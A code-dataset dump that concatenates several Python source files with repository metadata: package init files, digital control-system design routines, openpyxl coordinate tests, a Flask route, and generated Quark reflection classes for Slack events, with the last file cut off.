| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
79f4bc129bbe93b0fc1dab34b8fc789af3ba4b5d
| 113
|
py
|
Python
|
sb3_contrib/iqn/_init_.py
|
aniruddha123reinforcement/stable-baselines3-contrib
|
45d00c8657ed75ef9f6efc14a415ff6e56734fc7
|
[
"MIT"
] | null | null | null |
sb3_contrib/iqn/_init_.py
|
aniruddha123reinforcement/stable-baselines3-contrib
|
45d00c8657ed75ef9f6efc14a415ff6e56734fc7
|
[
"MIT"
] | null | null | null |
sb3_contrib/iqn/_init_.py
|
aniruddha123reinforcement/stable-baselines3-contrib
|
45d00c8657ed75ef9f6efc14a415ff6e56734fc7
|
[
"MIT"
] | null | null | null |
from sb3_contrib.iqn.policies import CnnPolicy, MlpPolicy, MultiInputPolicy
from sb3_contrib.iqn.iqn import IQN
| 37.666667
| 75
| 0.849558
| 16
| 113
| 5.875
| 0.5625
| 0.148936
| 0.297872
| 0.361702
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019608
| 0.097345
| 113
| 2
| 76
| 56.5
| 0.901961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
03276b9019d3f5d7dd1aaebb9b63ce3347a5f5d2
| 89
|
py
|
Python
|
fmkr/__init__.py
|
cgohlke/fmkr
|
41398aef2a79f3780b06de66d4d87428271b3343
|
[
"BSD-3-Clause"
] | 1
|
2020-02-23T20:18:03.000Z
|
2020-02-23T20:18:03.000Z
|
fmkr/__init__.py
|
cgohlke/fmkr
|
41398aef2a79f3780b06de66d4d87428271b3343
|
[
"BSD-3-Clause"
] | null | null | null |
fmkr/__init__.py
|
cgohlke/fmkr
|
41398aef2a79f3780b06de66d4d87428271b3343
|
[
"BSD-3-Clause"
] | null | null | null |
# fmkr/__init__.py
from .fmkr import __doc__, __all__, __version__
from .fmkr import *
| 14.833333
| 47
| 0.752809
| 12
| 89
| 4.25
| 0.666667
| 0.313725
| 0.54902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157303
| 89
| 5
| 48
| 17.8
| 0.68
| 0.179775
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0332dfa131e387b3fb4157a229e295c86db5ec6f
| 21,619
|
py
|
Python
|
control_design.py
|
tderensis/digital_control
|
2ab6c67815e79396520aab351573fe0b82131e29
|
[
"MIT"
] | null | null | null |
control_design.py
|
tderensis/digital_control
|
2ab6c67815e79396520aab351573fe0b82131e29
|
[
"MIT"
] | null | null | null |
control_design.py
|
tderensis/digital_control
|
2ab6c67815e79396520aab351573fe0b82131e29
|
[
"MIT"
] | null | null | null |
"""
Functions that construct stable closed loop control systems. Many of the
methods here are adapted from Digital Control: A State-Space Approach and
accompanying courses at URI.
Requires numpy, scipy, control
"""
from __future__ import print_function
import control_poles
import control
import numpy as np
from numpy import linalg as LA
from scipy import signal
import cmath
def find_candadate_spoles(sys, desired_settling_time, disp = True):
spoles = []
(sys_spoles, vectors) = LA.eig(sys.A)
if disp:
print("system poles:")
print(*sys_spoles, sep="\n")
# first go through the system poles and see if they are suitable.
s1_normalized = control_poles.bessel_spoles(1, desired_settling_time)[0]
if disp:
print("s1 normalized to", desired_settling_time, "s = ", s1_normalized)
for pole in sys_spoles:
if pole.real < s1_normalized.real:
# Use sufficiently damped plant poles: plant poles whose real parts lie to the left of s1/Ts.
spoles.append(pole)
if disp:
print("Using sufficiently damped plant pole", pole)
elif pole.imag != 0 and pole.real > s1_normalized.real and pole.real < 0:
# Replace real part of a complex pole that is not sufficiently damped with s1/Ts
pole = complex(s1_normalized.real, pole.imag)
spoles.append(pole)
if disp:
print("Using added damping pole", pole)
elif pole.real > 0 and -pole.real < s1_normalized.real:
# Reflect the pole about the imaginary axis and use that
pole = complex(-pole.real, pole.imag)
spoles.append(pole)
if disp:
print("Using pole reflection", pole)
else:
if disp:
print("Pole not suitable", pole)
return spoles;
def design_regsf(sys_c_ol, sampling_interval, desired_settling_time, spoles=None, disp=True):
""" Design a digital full state feedback regulator with the desired settling time.
Args:
sys_c_ol (StateSpace): The continouous plant model
sampling_interval: The sampling interval for the digital control system in seconds.
desired_settling_time: The desired settling time in seconds
spoles (optional): The desired closed loop poles. If not supplied, then optimal
poles will try to be used. Default is None.
Returns:
tuple: (sys_d_ol, L) Where sys_d_ol is the discrete plant and L is the stablizing
gain matrix.
"""
# Make sure the system is in fact continuous and not discrete
if sys_c_ol.dt != None:
print("Error: Function expects continuous plant")
return None
A = sys_c_ol.A
B = sys_c_ol.B
C = sys_c_ol.C
D = sys_c_ol.D
num_states = A.shape[0]
num_inputs = B.shape[1]
num_outputs = C.shape[0]
# Convert to discrete system using zero order hold method
sys_d_ol = sys_c_ol.to_discrete(sampling_interval, method="zoh")
phi = sys_d_ol.A
gamma = sys_d_ol.B
# Check controlability of the discrete system
controllability_mat = control.ctrb(phi, gamma)
rank = LA.matrix_rank(controllability_mat)
if rank != num_states:
print("Error: System is not controlable")
return None
# Check observability of the discrete system
observability_mat = control.obsv(phi, C)
rank = LA.matrix_rank(observability_mat)
if rank != num_states:
print("Error: System is not observable")
return None
# Choose poles if none were given
if spoles is None:
spoles = find_candadate_spoles(sys_c_ol, desired_settling_time, disp)
num_spoles_left = num_states - len(spoles)
if num_spoles_left > 0:
# Use normalized bessel poles for the rest
spoles.extend(control_poles.bessel_spoles(num_spoles_left, desired_settling_time))
zpoles = control_poles.spoles_to_zpoles(spoles, sampling_interval)
if disp:
print("spoles = ", spoles)
print("zpoles = ", zpoles)
# place the poles such that ...
full_state_feedback = signal.place_poles(phi, gamma, zpoles)
# Check the poles for stability
for zpole in full_state_feedback.computed_poles:
if abs(zpole) > 1:
print("Computed pole is not stable")
return None
L = full_state_feedback.gain_matrix
return (sys_d_ol, np.matrix(L))
def design_regob(sys_c_ol, sampling_interval, desired_settling_time,
desired_observer_settling_time=None, spoles=None, sopoles=None,
disp=True):
""" Design a digital full order observer regulator with the desired settling time.
Args:
sys_c_ol (StateSpace): The continouous plant model
sampling_interval: The sampling interval for the digital control system in seconds.
desired_settling_time: The desired settling time in seconds
desired_observer_settling_time (optional): The desired observer settling time
in seconds. If not provided the observer settling time will be 4 times faster
than the overall settling time. Default is None.
spoles (optional): The desired closed loop poles. If not supplied, then optimal
poles will try to be used. Default is None.
sopoles (optional): The desired observer poles. If not supplied, then optimal
poles will try to be used. Default is None.
disp: Print debugging output. Default is True.
Returns:
tuple: (sys_d_ol, L, K) Where sys_d_ol is the discrete plant, L is the stablizing
gain matrix, and K is the observer gain matrix.
"""
# Make sure the system is in fact continuous and not discrete
if sys_c_ol.dt != None:
print("Error: Function expects continuous plant")
return None
A = sys_c_ol.A
B = sys_c_ol.B
C = sys_c_ol.C
D = sys_c_ol.D
num_states = A.shape[0]
num_inputs = B.shape[1]
num_outputs = C.shape[0]
# Convert to discrete system using zero order hold method
sys_d_ol = sys_c_ol.to_discrete(sampling_interval, method="zoh")
phi = sys_d_ol.A
gamma = sys_d_ol.B
# Check controlability of the discrete system
controllability_mat = control.ctrb(phi, gamma)
rank = LA.matrix_rank(controllability_mat)
if rank != num_states:
print(rank, num_states)
print("Error: System is not controlable")
return None
# Check observability of the discrete system
observability_mat = control.obsv(phi, C)
rank = LA.matrix_rank(observability_mat)
if rank != num_states:
print("Error: System is not observable")
return None
# Choose poles if none were given
if spoles is None:
spoles = find_candadate_spoles(sys_c_ol, desired_settling_time, disp)
num_spoles_left = num_states - len(spoles)
if num_spoles_left > 0:
# Use normalized bessel poles for the rest
spoles.extend(control_poles.bessel_spoles(num_spoles_left, desired_settling_time))
zpoles = control_poles.spoles_to_zpoles(spoles, sampling_interval)
if disp:
print("spoles = ", spoles)
print("zpoles = ", zpoles)
# place the poles such that eig(phi - gamma*L) are inside the unit circle
full_state_feedback = signal.place_poles(phi, gamma, zpoles)
# Check the poles for stability just in case
for zpole in full_state_feedback.computed_poles:
if abs(zpole) >= 1:
print("Computed pole is not stable")
return None
L = full_state_feedback.gain_matrix
# Choose poles if none were given
if sopoles is None:
sopoles = []
if desired_observer_settling_time == None:
desired_observer_settling_time = desired_settling_time/4
# TODO: Find existing poles based on the rules. For now just use bessel
num_sopoles_left = num_states - len(sopoles)
if num_sopoles_left > 0:
# Use normalized bessel poles for the rest
sopoles.extend(control_poles.bessel_spoles(num_sopoles_left, desired_observer_settling_time))
if disp:
print("Using normalized bessel for the remaining", num_sopoles_left, "sopoles")
zopoles = control_poles.spoles_to_zpoles(sopoles, sampling_interval)
if disp:
print("sopoles = ", sopoles)
print("zopoles = ", zopoles)
# Find K such that eig(phi - KC) are inside the unit circle
full_state_feedback = signal.place_poles(np.transpose(phi), np.transpose(C), zopoles)
# Check the poles for stability just in case
for zopole in full_state_feedback.computed_poles:
if abs(zopole) > 1:
print("Computed observer pole is not stable")
return None
K = np.transpose(full_state_feedback.gain_matrix)
return (sys_d_ol, np.matrix(L), np.matrix(K))
def design_regredob(sys_c_ol, sampling_interval, desired_settling_time,
desired_observer_settling_time=None, spoles=None, sopoles=None,
disp=True):
""" Design a digital reduced order observer regulator with the desired settling time.
Args:
sys_c_ol (StateSpace): The continouous plant model
sampling_interval: The sampling interval for the digital control system in seconds.
desired_settling_time: The desired settling time in seconds
desired_observer_settling_time (optional): The desired observer settling time
in seconds. If not provided the observer settling time will be 4 times faster
than the overall settling time. Default is None.
spoles (optional): The desired closed loop poles. If not supplied, then optimal
poles will try to be used. Default is None.
sopoles (optional): The desired observer poles. If not supplied, then optimal
poles will try to be used. Default is None.
disp: Print debugging output. Default is True.
Returns:
tuple: (sys_d_ol, L1, L2, K, F, G, H) Where sys_d_ol is the discrete plant, L is the stablizing
gain matrix, and K is the observer gain matrix.
"""
# Make sure the system is in fact continuous and not discrete
if sys_c_ol.dt != None:
print("Error: Function expects continuous plant")
return None
A = sys_c_ol.A
B = sys_c_ol.B
C = sys_c_ol.C
D = sys_c_ol.D
num_states = A.shape[0]
num_inputs = B.shape[1]
num_outputs = C.shape[0]
num_measured_states = num_outputs
num_unmeasured_states = num_states - num_measured_states
# Convert to discrete system using zero order hold method
sys_d_ol = sys_c_ol.to_discrete(sampling_interval, method="zoh")
phi = sys_d_ol.A
gamma = sys_d_ol.B
# Check controlability of the discrete system
controllability_mat = control.ctrb(phi, gamma)
rank = LA.matrix_rank(controllability_mat)
if rank != num_states:
print(rank, num_states)
print("Error: System is not controlable")
return None
# Check observability of the discrete system
observability_mat = control.obsv(phi, C)
rank = LA.matrix_rank(observability_mat)
if rank != num_states:
print("Error: System is not observable")
return None
# Choose poles if none were given
if spoles is None:
spoles = find_candadate_spoles(sys_c_ol, desired_settling_time, disp)
num_spoles_left = num_states - len(spoles)
if num_spoles_left > 0:
# Use normalized bessel poles for the rest
spoles.extend(control_poles.bessel_spoles(num_spoles_left, desired_settling_time))
zpoles = control_poles.spoles_to_zpoles(spoles, sampling_interval)
if disp:
print("spoles = ", spoles)
print("zpoles = ", zpoles)
# place the poles such that eig(phi - gamma*L) are inside the unit circle
full_state_feedback = signal.place_poles(phi, gamma, zpoles)
# Check the poles for stability just in case
for zpole in full_state_feedback.computed_poles:
if abs(zpole) >= 1:
print("Computed pole is not stable")
return None
L = full_state_feedback.gain_matrix
# Choose poles if none were given
if sopoles is None:
sopoles = []
if desired_observer_settling_time == None:
desired_observer_settling_time = desired_settling_time/4
# TODO: Find existing poles based on the rules. For now just use bessel
num_sopoles_left = num_unmeasured_states - len(sopoles)
if num_sopoles_left > 0:
# Use normalized bessel poles for the rest
sopoles.extend(control_poles.bessel_spoles(num_sopoles_left, desired_observer_settling_time))
if disp:
print("Using normalized bessel for the remaining", num_sopoles_left, "sopoles")
zopoles = control_poles.spoles_to_zpoles(sopoles, sampling_interval)
if disp:
print("sopoles = ", sopoles)
print("zopoles = ", zopoles)
# partition out the phi and gamma matrix
phi11 = phi[:num_measured_states, :num_measured_states]
phi12 = phi[:num_measured_states, num_measured_states:]
phi21 = phi[num_measured_states, :num_measured_states]
phi22 = phi[num_measured_states:, num_measured_states:]
gamma1 = gamma[:num_measured_states]
gamma2 = gamma[num_measured_states:]
C1 = C[:num_measured_states, :num_measured_states]
if num_measured_states >= num_states/2 and LA.matrix_rank(phi12) == num_unmeasured_states:
# case 1
if num_unmeasured_states % 2 == 0:
F = np.matrix([
[zopoles[0].real, zopoles[0].imag],
[zopoles[1].imag, zopoles[1].real]
])
else:
# We only support 1 real pole
F = np.matrix([zopoles[0].real])
cp = C1 * phi12
cp_t = np.transpose(cp)
K = (phi22 - F)* np.linalg.inv(cp_t * cp) * cp_t
elif num_measured_states == 1:
# case 2 (unsupported)
print ("unsupported design with measured states = 1")
np.poly(np.eig(phi22))
else:
full_state_feedback = signal.place_poles(np.transpose(phi22), np.transpose(C1*phi12), zopoles)
K = np.transpose(full_state_feedback.gain_matrix)
F = phi22 - K * C1 * phi12
H = gamma2 - K * C1 * gamma1
G = (phi21 - K * C1 * phi11) * np.linalg.inv(C1) + (F * K)
# Check the poles for stability just in case
for zopole in full_state_feedback.computed_poles:
if abs(zopole) > 1:
print("Computed observer pole is not stable")
return None
return (sys_d_ol, np.matrix(L), np.matrix(K), np.matrix(F), np.matrix(G), np.matrix(H))
def design_tsob(sys_c_ol, Ca, sampling_interval, desired_settling_time,
desired_observer_settling_time=None, spoles=None, sopoles=None, sapoles=None,
disp=True):
""" Design a digital full order observer tracking system with the desired settling time.
Args:
sys_c_ol (StateSpace): The continouous plant model
sampling_interval: The sampling interval for the digital control system in seconds.
desired_settling_time: The desired settling time in seconds
desired_observer_settling_time (optional): The desired observer settling time
in seconds. If not provided the observer settling time will be 4 times faster
than the overall settling time. Default is None.
spoles (optional): The desired closed loop poles. If not supplied, then optimal
poles will try to be used. Default is None.
sopoles (optional): The desired observer poles. If not supplied, then optimal
poles will try to be used. Default is None.
sapoles (optional): The poles of the reference input and disturbance vectors.
If not supplied the reference input is assumed to be a step. Default is None.
disp: Print debugging output. Default is True.
Returns:
tuple: (sys_d_ol, phia, gammaa, L1, L2, K) Where sys_d_ol is the discrete plant,
phia is the discrete additional dynamics A matrix, gammaa is the discrete
additional dynamics B matrix, L1 is the plant gain matrix, L2 is the
additional gain matrix, and K is the observer gain matrix.
"""
if disp:
print("Designing a tracking system with full order observer.")
# Make sure the system is in fact continuous and not discrete
if sys_c_ol.dt != None:
print("Error: Function expects continuous plant")
return None
A = sys_c_ol.A
B = sys_c_ol.B
C = sys_c_ol.C
D = sys_c_ol.D
num_states = A.shape[0]
num_inputs = B.shape[1]
num_outputs = C.shape[0]
num_tracked = Ca.shape[0]
# Convert to discrete system using zero order hold method
sys_d_ol = sys_c_ol.to_discrete(sampling_interval, method="zoh")
phi = sys_d_ol.A
gamma = sys_d_ol.B
# Check controlability of the discrete system
controllability_mat = control.ctrb(phi, gamma)
rank = LA.matrix_rank(controllability_mat)
if rank != num_states:
print(rank, num_states)
print("Error: System is not controlable")
return None
# Check observability of the discrete system
observability_mat = control.obsv(phi, C)
rank = LA.matrix_rank(observability_mat)
if rank != num_states:
print("Error: System is not observable")
return None
# Create the design model with additional dynamics
if sapoles is None:
# assume tracking a step input (s=0, z=1)
sapoles = [0]
zapoles = [ -p for p in np.poly(control_poles.spoles_to_zpoles(sapoles, sampling_interval)) ]
zapoles = np.delete(zapoles, 0) # the first coefficient isn't important
gammaa = np.transpose(np.matrix(zapoles))
q = gammaa.shape[0]
phia_left = np.matrix(gammaa)
phia_right = np.concatenate((np.eye(q-1), np.zeros((1, q-1))), axis=0)
phia = np.concatenate((phia_left, phia_right), axis=1)
if num_tracked > 1:
# replicate the additional dynamics
phia = np.kron(np.eye(num_tracked), phia)
gammaa = np.kron(np.eye(num_tracked), gammaa)
# Form the design matrix
phid_top_row = np.concatenate((phi, np.zeros((num_states, q*num_tracked))), axis=1)
phid_bot_row = np.concatenate((gammaa*Ca, phia), axis=1)
phid = np.concatenate((phid_top_row, phid_bot_row), axis=0)
gammad = np.concatenate((gamma, np.zeros((gammaa.shape[0], num_tracked))), axis=0)
# Choose poles if none were given
if spoles is None:
spoles = find_candadate_spoles(sys_c_ol, desired_settling_time, disp)
num_spoles_left = num_states - len(spoles)
if num_spoles_left > 0:
# Use normalized bessel poles for the rest
spoles.extend(control_poles.bessel_spoles(num_spoles_left, desired_settling_time))
zpoles = control_poles.spoles_to_zpoles(spoles, sampling_interval)
if disp:
print("spoles = ", spoles)
print("zpoles = ", zpoles)
# place the poles such that eig(phi - gamma*L) are inside the unit circle
full_state_feedback = signal.place_poles(phid, gammad, zpoles)
# Check the poles for stability just in case
for zpole in full_state_feedback.computed_poles:
if abs(zpole) >= 1:
print("Computed pole is not stable", zpole)
return None
L = full_state_feedback.gain_matrix
L1 = L[:,0:num_states]
L2 = L[:,num_states:]
# Choose poles if none were given
if sopoles is None:
sopoles = []
if desired_observer_settling_time == None:
desired_observer_settling_time = desired_settling_time/4
# TODO: Find existing poles based on the rules. For now just use bessel
num_sopoles_left = num_states - len(sopoles)
if num_sopoles_left > 0:
# Use normalized bessel poles for the rest
sopoles.extend(control_poles.bessel_spoles(num_sopoles_left, desired_observer_settling_time))
zopoles = control_poles.spoles_to_zpoles(sopoles, sampling_interval)
if disp:
print("sopoles = ", sopoles)
print("zopoles = ", zopoles)
# Find K such that eig(phi - KC) are inside the unit circle
full_state_feedback = signal.place_poles(np.transpose(phi), np.transpose(C), zopoles)
# Check the poles for stability just in case
for zopole in full_state_feedback.computed_poles:
if abs(zopole) > 1:
print("Computed observer pole is not stable", zopole)
return None
K = np.transpose(full_state_feedback.gain_matrix)
return (sys_d_ol, phia, gammaa, np.matrix(L1), np.matrix(L2), np.matrix(K))
| 39.595238
| 106
| 0.643832
| 2,922
| 21,619
| 4.581451
| 0.092402
| 0.048405
| 0.016135
| 0.036304
| 0.801374
| 0.791514
| 0.78001
| 0.76014
| 0.745873
| 0.737282
| 0
| 0.008135
| 0.283593
| 21,619
| 545
| 107
| 39.66789
| 0.856211
| 0.316712
| 0
| 0.723127
| 0
| 0
| 0.07912
| 0
| 0
| 0
| 0
| 0.005505
| 0
| 1
| 0.016287
| false
| 0
| 0.022801
| 0
| 0.117264
| 0.156352
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
034293ce2a04f11b0dc31d8028d05497414807a9
| 2,234
|
py
|
Python
|
tests/test_08_0_openpyxl.py
|
simkimsia/ug-read-write-excel-using-python
|
ac84ca5aac3a71700e8f63a64c5b9bdd58df5804
|
[
"MIT"
] | 1
|
2018-03-31T07:39:08.000Z
|
2018-03-31T07:39:08.000Z
|
tests/test_08_0_openpyxl.py
|
simkimsia/ug-read-write-excel-using-python
|
ac84ca5aac3a71700e8f63a64c5b9bdd58df5804
|
[
"MIT"
] | 11
|
2018-03-01T07:47:06.000Z
|
2018-03-23T06:29:04.000Z
|
tests/test_08_0_openpyxl.py
|
simkimsia/ug-read-write-excel-using-python
|
ac84ca5aac3a71700e8f63a64c5b9bdd58df5804
|
[
"MIT"
] | 1
|
2018-02-28T15:05:22.000Z
|
2018-02-28T15:05:22.000Z
|
from examples.c08_0_convert_indices_coordinates.openpyxl import index
from base_test_cases import ExcelTest
class TestOpenPyXLIndicesCoordinates(ExcelTest):
def test_coordinates_to_indices(self):
coordinate_string = 'A4'
zero_based = True
expected_indices = (0, 3)
indices = index.coordinate_to_index(coordinate_string, zero_based)
self.assertEqual(indices, expected_indices)
zero_based = False
expected_indices = (1, 4)
indices = index.coordinate_to_index(coordinate_string, zero_based)
self.assertEqual(indices, expected_indices)
coordinate_string = 'AB24'
zero_based = True
expected_indices = (27, 23)
indices = index.coordinate_to_index(coordinate_string, zero_based)
self.assertEqual(indices, expected_indices)
zero_based = False
expected_indices = (28, 24)
indices = index.coordinate_to_index(coordinate_string, zero_based)
self.assertEqual(indices, expected_indices)
def test_indices_to_coordinates(self):
indices = (1, 4)
zero_based = False
expected_coordinate_string = 'A4'
coordinate_string = index.index_to_coordinate(indices, zero_based)
self.assertEqual(coordinate_string, expected_coordinate_string)
zero_based = True
expected_coordinate_string = 'B5'
coordinate_string = index.index_to_coordinate(indices, zero_based)
self.assertEqual(coordinate_string, expected_coordinate_string)
indices = (1, 1)
zero_based = True
expected_coordinate_string = 'B2'
coordinate_string = index.index_to_coordinate(indices, zero_based)
self.assertEqual(coordinate_string, expected_coordinate_string)
indices = (28, 24)
zero_based = False
expected_coordinate_string = 'AB24'
coordinate_string = index.index_to_coordinate(indices, zero_based)
self.assertEqual(coordinate_string, expected_coordinate_string)
zero_based = True
expected_coordinate_string = 'AC25'
coordinate_string = index.index_to_coordinate(indices, zero_based)
self.assertEqual(coordinate_string, expected_coordinate_string)
| 38.517241
| 74
| 0.713071
| 245
| 2,234
| 6.126531
| 0.159184
| 0.277149
| 0.159893
| 0.143904
| 0.815456
| 0.778148
| 0.702865
| 0.702865
| 0.702865
| 0.702865
| 0
| 0.018933
| 0.219785
| 2,234
| 57
| 75
| 39.192982
| 0.842226
| 0
| 0
| 0.586957
| 0
| 0
| 0.008953
| 0
| 0
| 0
| 0
| 0
| 0.195652
| 1
| 0.043478
| false
| 0
| 0.043478
| 0
| 0.108696
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
037388499d8705c139aeb5800119165a1809ae02
| 144
|
py
|
Python
|
app/blueprints/info/routes.py
|
reynoldsjs/Final-Project
|
989afb729fa58e9b98ce14c123c692a08ced5807
|
[
"CC-BY-3.0"
] | null | null | null |
app/blueprints/info/routes.py
|
reynoldsjs/Final-Project
|
989afb729fa58e9b98ce14c123c692a08ced5807
|
[
"CC-BY-3.0"
] | null | null | null |
app/blueprints/info/routes.py
|
reynoldsjs/Final-Project
|
989afb729fa58e9b98ce14c123c692a08ced5807
|
[
"CC-BY-3.0"
] | 1
|
2021-01-29T04:32:25.000Z
|
2021-01-29T04:32:25.000Z
|
from . import bp as info
from flask import render_template
@info.route('/about_us')
def about_us():
return render_template('aboutus.html')
| 20.571429
| 42
| 0.75
| 22
| 144
| 4.727273
| 0.681818
| 0.269231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138889
| 144
| 6
| 43
| 24
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0.145833
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
cefe8cbd77cce18bc848eb5f688cc3adbcaf7dc7
| 35,030
|
py
|
Python
|
quarkc/test/ffi/expected/py/slackpack/slackpack_md/__init__.py
|
datawire/quark
|
df0058a148b077c0aff535eb6ee382605c556273
|
[
"Apache-2.0"
] | 112
|
2015-10-02T19:51:51.000Z
|
2022-03-07T06:29:44.000Z
|
quarkc/test/ffi/expected/py/slackpack/slackpack_md/__init__.py
|
datawire/quark
|
df0058a148b077c0aff535eb6ee382605c556273
|
[
"Apache-2.0"
] | 181
|
2015-10-01T20:23:38.000Z
|
2016-12-07T17:21:26.000Z
|
quarkc/test/ffi/expected/py/slackpack/slackpack_md/__init__.py
|
datawire/quark
|
df0058a148b077c0aff535eb6ee382605c556273
|
[
"Apache-2.0"
] | 31
|
2015-10-13T22:10:00.000Z
|
2020-08-03T02:50:12.000Z
|
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from builtins import str as unicode
from quark_runtime import *
_lazyImport.plug("slackpack_md.slack_event_SlackEvent_load_Method")
import quark.reflect
class slack_event_SlackEvent_load_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_event_SlackEvent_load_Method, self).__init__(u"quark.void", u"load", _List([u"slack.Client", u"quark.JSONObject"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.event.SlackEvent);
(obj).load(_cast((args)[0], lambda: slack.Client), _cast((args)[1], lambda: _JSONObject));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_event_SlackEvent_dispatch_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_event_SlackEvent_dispatch_Method, self).__init__(u"quark.void", u"dispatch", _List([u"slack.SlackHandler"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.event.SlackEvent);
(obj).dispatch(_cast((args)[0], lambda: slack.SlackHandler));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_event_SlackEvent(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slack_event_SlackEvent, self).__init__(u"slack.event.SlackEvent");
(self).name = u"slack.event.SlackEvent"
(self).parameters = _List([])
(self).fields = _List([quark.reflect.Field(u"quark.String", u"type"), quark.reflect.Field(u"slack.User", u"user"), quark.reflect.Field(u"slack.Channel", u"channel"), quark.reflect.Field(u"quark.String", u"timestamp")])
(self).methods = _List([slack_event_SlackEvent_load_Method(), slack_event_SlackEvent_dispatch_Method()])
(self).parents = _List([u"quark.Object"])
def construct(self, args):
return slack.event.SlackEvent()
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slack_event_SlackEvent.singleton = slack_event_SlackEvent()
class slack_event_SlackError_load_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_event_SlackError_load_Method, self).__init__(u"quark.void", u"load", _List([u"slack.Client", u"quark.JSONObject"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.event.SlackError);
(obj).load(_cast((args)[0], lambda: slack.Client), _cast((args)[1], lambda: _JSONObject));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_event_SlackError_dispatch_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_event_SlackError_dispatch_Method, self).__init__(u"quark.void", u"dispatch", _List([u"slack.SlackHandler"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.event.SlackError);
(obj).dispatch(_cast((args)[0], lambda: slack.SlackHandler));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_event_SlackError(quark.reflect.Class):
def _init(self):
quark.reflect.Class._init(self)
def __init__(self):
super(slack_event_SlackError, self).__init__(u"slack.event.SlackError");
(self).name = u"slack.event.SlackError"
(self).parameters = _List([])
(self).fields = _List([quark.reflect.Field(u"quark.String", u"type"), quark.reflect.Field(u"slack.User", u"user"), quark.reflect.Field(u"slack.Channel", u"channel"), quark.reflect.Field(u"quark.String", u"timestamp"), quark.reflect.Field(u"quark.int", u"code"), quark.reflect.Field(u"quark.String", u"text")])
(self).methods = _List([slack_event_SlackError_load_Method(), slack_event_SlackError_dispatch_Method()])
(self).parents = _List([u"slack.event.SlackEvent"])
def construct(self, args):
return slack.event.SlackError()
def isAbstract(self):
return False
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
slack_event_SlackError.singleton = slack_event_SlackError()
class slack_event_Hello_dispatch_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_event_Hello_dispatch_Method, self).__init__(u"quark.void", u"dispatch", _List([u"slack.SlackHandler"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.event.Hello);
(obj).dispatch(_cast((args)[0], lambda: slack.SlackHandler));
return None
def _getClass(self):
return _cast(None, lambda: unicode)
def _getField(self, name):
return None
def _setField(self, name, value):
pass
class slack_event_Hello_load_Method(quark.reflect.Method):
def _init(self):
quark.reflect.Method._init(self)
def __init__(self):
super(slack_event_Hello_load_Method, self).__init__(u"quark.void", u"load", _List([u"slack.Client", u"quark.JSONObject"]));
def invoke(self, object, args):
obj = _cast(object, lambda: slack.event.Hello);
